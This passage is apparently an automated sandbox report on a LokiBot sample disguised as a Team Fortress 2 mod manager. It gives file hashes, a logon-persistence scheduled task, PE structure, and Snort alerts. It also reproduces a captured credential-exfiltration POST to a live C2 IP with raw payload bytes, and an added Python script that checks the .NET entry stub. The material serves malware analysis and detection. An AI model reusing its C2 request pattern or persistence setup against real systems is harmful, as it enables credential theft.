                    SHA-512:C1EA31DD5860BF44427022764E448F3EA7F09548BE2BF9124B59F4CD79A827C64FE3D7094E5E768D39482AC576E1D92AC5CF0C4C29D54D62C8F457D1E00E1676
                    Malicious:true
                    Reputation:low
                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):598
                    Entropy (8bit):0.6390116820665388
                    Encrypted:false
                    SSDEEP:3:/lbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbq:4/g/g/g/g/g/g
                    MD5:80F54DC1616678F37E478AC064CEC423
                    SHA1:B8DB85EC31702B48B95A727092A38B446360FCA7
                    SHA-256:A3AD19CA6EA04695FCD30034EAF389235385F3FA283837316916AF0CDA09DCC0
                    SHA-512:6B3595E6C9B1EF62BBF5FA5716AFC09CF5025FB3E8B8906B773B37AE0EB6DB10A3DBC0392E681D9DDA72EDF6FB357679F9E2BC06B7857B11083A916FE0A2DEE5
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    C:\Users\user\AppData\Roaming\UieOsrSocP.exe
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):1219072
                    Entropy (8bit):7.089897950228557
                    Encrypted:false
                    SSDEEP:12288:jvMXXIcXoiXXIcXo0XXIcXoJ1scLjkQnoBwE6DIQ4myILwpqtIEHwtefVNOaHGCd:4/hELjeuGtZqtIEQtwOaHGC+2ZZZD/2o
                    MD5:76AFCE42F708E6A32DC9D0E52F9F0336
                    SHA1:D7A3D05C161BCFDAFE6348D82672D011FC5B05CC
                    SHA-256:9E658EB8027169730EF306E2E3B145DD71C9D9F569CE7DD7C8264A0DFC114D87
                    SHA-512:DB66F324D80D2CBE1DC9B0FD7CCDEED896ED5E4E08C4E837542D27371AB05BEFDB43DFB46655EF725ABA3B3A6582BE908DA5A6D44BDDE7900977520EB355E3D9
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 26%
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................z............... ........@.. ....................................@.................................P...W.................................................................................... ............... ..H............text....y... ...z.................. ..`.reloc...............|..............@..B.rsrc................~..............@..@........................H........@...X......$...T...|...........................................z.(......}.....( ...o!...}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s"...z.2.{.....W...*....0..<........{......3..{....( ...o!...3...}......+..s.......{....}..
                    C:\Users\user\AppData\Roaming\UieOsrSocP.exe:Zone.Identifier
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: [ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.089897950228557
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:2CW1YLhNIS.exe
                    File size:1219072
                    MD5:76afce42f708e6a32dc9d0e52f9f0336
                    SHA1:d7a3d05c161bcfdafe6348d82672d011fc5b05cc
                    SHA256:9e658eb8027169730ef306e2e3b145dd71c9d9f569ce7dd7c8264a0dfc114d87
                    SHA512:db66f324d80d2cbe1dc9b0fd7ccdeed896ed5e4e08c4e837542d27371ab05befdb43dfb46655ef725aba3b3a6582be908da5a6d44bdde7900977520eb355e3d9
                    SSDEEP:12288:jvMXXIcXoiXXIcXo0XXIcXoJ1scLjkQnoBwE6DIQ4myILwpqtIEHwtefVNOaHGCd:4/hELjeuGtZqtIEQtwOaHGC+2ZZZD/2o
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................z............... ........@.. ....................................@................................

                    File Icon

                    Icon Hash:86a8b6ca9496ca9a

                    Static PE Info

                    General

                    Entrypoint:0x5199aa
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x60D196E2 [Tue Jun 22 07:53:06 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    (The remaining bytes of the entrypoint preview are all zero and disassemble as 97 repetitions of "add byte ptr [eax], al"; they are padding, not code. The jump target 0x00402000 is imagebase 0x400000 plus the IAT directory RVA 0x2000, i.e. the single import slot holding the address of mscoree!_CorExeMain. This six-byte indirect jump is the standard native entry stub of a .NET executable: control passes straight to the CLR, and the real logic lives in the managed code, not at the PE entrypoint.)

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x119950 | 0x57 | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11c000 | 0x11a8c | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11a000 | 0xc | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0x1179b0 | 0x117a00 | False | 0.652703467255 | PGP symmetric key encrypted data - Plaintext or unencrypted data | 7.17424045556 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .reloc | 0x11a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .rsrc | 0x11c000 | 0x11a8c | 0x11c00 | False | 0.264510893486 | data | 5.50345948852 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0x11c1f0 | 0x1bcb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                    RT_ICON | 0x11ddbc | 0xc828 | data | |
                    RT_ICON | 0x12a5e4 | 0x1ca8 | data | |
                    RT_ICON | 0x12c28c | 0xca8 | data | |
                    RT_ICON | 0x12cf34 | 0x568 | GLS_BINARY_LSB_FIRST | |
                    RT_GROUP_ICON | 0x12d49c | 0x4c | data | |
                    RT_VERSION | 0x12d4e8 | 0x3f0 | SysEx File - OctavePlateau | |
                    RT_MANIFEST | 0x12d8d8 | 0x1b4 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | |

                    Imports

                    DLL | Import
                    mscoree.dll | _CorExeMain
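The entry stub, the IAT and COM_DESCRIPTOR directories and the single mscoree.dll import above together form the fingerprint of a managed (.NET) executable: the native entrypoint is nothing but an indirect jump through the one IAT slot to _CorExeMain, and the managed code the CLR runs afterwards is where the unpacker and injector live. The script below is an added example written for this page, not the report's own tooling and not code from the sample; it puts the numbers from the tables above through that check. The six stub bytes FF 25 00 20 40 00 are reconstructed from the disassembly in "Entrypoint Preview" (FF 25 is the encoding of jmp dword ptr [disp32]); every other value is copied from the report.

```python
"""Classify the PE entry stub of 2CW1YLhNIS.exe from the report's tables.

Added example for this page; not the report's tooling, not the sample's code.
Addresses come from the Static PE Info tables. ENTRY_BYTES is reconstructed
from the disassembly (FF 25 disp32 == jmp dword ptr [disp32]); nothing else
about the file's bytes is assumed.
"""
import struct

IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x5199AA                           # "Entrypoint" in the report
ENTRY_BYTES = bytes.fromhex("FF 25 00 20 40 00")    # reconstructed, see docstring

# (name, virtual address, virtual size) from the "Sections" table
SECTIONS = [
    (".text",  0x2000,   0x1179B0),
    (".reloc", 0x11A000, 0xC),
    (".rsrc",  0x11C000, 0x11A8C),
]
# (virtual address, size) from the "Data Directories" table
DATA_DIRS = {
    "IAT":            (0x2000,   0x8),
    "IMPORT":         (0x119950, 0x57),
    "COM_DESCRIPTOR": (0x2008,   0x48),
}
# from the "Imports" table
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}


def section_for_rva(rva: int):
    """Name of the section whose virtual range contains rva, or None."""
    for name, va, size in SECTIONS:
        if va <= rva < va + size:
            return name
    return None


def in_directory(rva: int, name: str) -> bool:
    """True if rva lies inside the named (non-empty) data directory."""
    start, size = DATA_DIRS[name]
    return size != 0 and start <= rva < start + size


def decode_indirect_jmp(code: bytes) -> int:
    """Return the absolute slot address of a `jmp dword ptr [disp32]` (FF 25)."""
    if len(code) < 6 or code[:2] != b"\xff\x25":
        raise ValueError("not an FF 25 indirect jump")
    return struct.unpack_from("<I", code, 2)[0]


def classify_entry_stub() -> dict:
    """Run the managed-stub checks against the values copied from the report."""
    entry_rva = ENTRY_POINT_VA - IMAGE_BASE
    slot_rva = decode_indirect_jmp(ENTRY_BYTES) - IMAGE_BASE
    text_va, text_size = SECTIONS[0][1], SECTIONS[0][2]
    imp_va, imp_size = DATA_DIRS["IMPORT"]
    result = {
        "entry_rva": entry_rva,
        "entry_section": section_for_rva(entry_rva),
        # the 6-byte stub is the very last thing in .text
        "stub_is_last_bytes_of_text": entry_rva + 6 == text_va + text_size,
        # the import table sits immediately in front of it
        "import_table_precedes_stub": imp_va + imp_size <= entry_rva,
        "jump_slot_rva": slot_rva,
        "jump_slot_in_iat": in_directory(slot_rva, "IAT"),
        "iat_slots": DATA_DIRS["IAT"][1] // 4,   # 2 == one pointer + null terminator
        "has_clr_header": DATA_DIRS["COM_DESCRIPTOR"][1] != 0,
        "only_import_is_CorExeMain": IMPORTS == {"mscoree.dll": ["_CorExeMain"]},
    }
    result["is_managed_stub"] = (
        result["jump_slot_in_iat"] and result["iat_slots"] == 2
        and result["has_clr_header"] and result["only_import_is_CorExeMain"]
    )
    return result


if __name__ == "__main__":
    for key, value in classify_entry_stub().items():
        print(f"{key:28} {hex(value) if type(value) is int else value}")
```

Every check comes out true for this sample, which is why the native disassembly is uninformative here: the analyst's next stop is the managed code (a .NET decompiler), where the ".NET source code contains potential unpacker" and process-injection signatures in the overview come from.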

                    Version Infos

                    Description | Data
                    Translation | 0x0000 0x04b0
                    LegalCopyright | Copyright bluFiles 2013
                    Assembly Version | 1.0.0.0
                    InternalName | SearchData.exe
                    FileVersion | 1.0.0.0
                    CompanyName | bluFiles
                    LegalTrademarks | ola k ase
                    Comments | Activa / Desactiva / Instala modificaciones al juego Team Fortress 2 (Spanish: "Enables / disables / installs modifications for the game Team Fortress 2")
                    ProductName | Tf2ModManager
                    ProductVersion | 1.0.0.0
                    FileDescription | Tf2 Mod Manager
                    OriginalFilename | SearchData.exe

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    06/22/21-18:23:10.839209 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:10.839209 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:10.839209 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:10.839209 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:12.059133 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:12.059133 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:12.059133 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:12.059133 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:13.182092 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:13.182092 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:13.182092 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:13.182092 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:14.320616 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:14.320616 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:14.320616 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    06/22/21-18:23:14.320616 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49741 | 80 | 192.168.2.4 | 63.141.228.141

                    Network Port Distribution

                    TCP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jun 22, 2021 18:23:10.672245026 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:10.831842899 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:10.831969976 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:10.839209080 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.000123024 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.000273943 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.162691116 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658402920 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658443928 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658499002 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658540964 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.658548117 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658580065 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658617973 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658648968 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658660889 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.658677101 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.658689976 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.658742905 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.658787966 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.667711020 CEST | 80 | 49735 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:11.667861938 CEST | 49735 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:11.892693043 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.054799080 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.054970026 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.059133053 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.219713926 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.219800949 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.379004955 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.893781900 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.893882036 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.893944025 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.893996954 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.894001961 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.894057989 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.894121885 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.894121885 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.894182920 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.894191027 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.894217968 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.894329071 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.894357920 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:12.902987003 CEST | 80 | 49737 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:12.903398037 CEST | 49737 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:13.019453049 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:13.179152966 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:13.179404020 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:13.182091951 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:13.341525078 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:13.342540026 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:13.502113104 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000350952 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000412941 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000477076 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000520945 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000557899 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000595093 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000632048 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000668049 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.000715971 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.000869989 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.001041889 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.008945942 CEST | 80 | 49739 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.009135008 CEST | 49739 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.154073000 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.313632965 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.313771009 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.320616007 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.480439901 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:14.480549097 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:14.640264034 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133425951 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133486986 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133528948 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133567095 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133569002 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:15.133605003 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133620024 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:15.133641958 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133680105 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133697033 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:15.133716106 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.133764982 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:15.142693996 CEST | 80 | 49741 | 63.141.228.141 | 192.168.2.4
                    Jun 22, 2021 18:23:15.142910004 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141
                    Jun 22, 2021 18:23:18.268584967 CEST | 49741 | 80 | 192.168.2.4 | 63.141.228.141

                    HTTP Request Dependency Graph

                    • 63.141.228.141

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.4 | 49735 | 63.141.228.141 | 80 | C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jun 22, 2021 18:23:10.839209080 CEST | 1229 | OUT | POST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 190
                    Connection: close
                    Jun 22, 2021 18:23:11.000273943 CEST | 1229 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones610930DESKTOP-716T771k08F9C4E9C79A3B52B3F739430eljqb
                    Jun 22, 2021 18:23:11.658402920 CEST | 1232 | IN | HTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
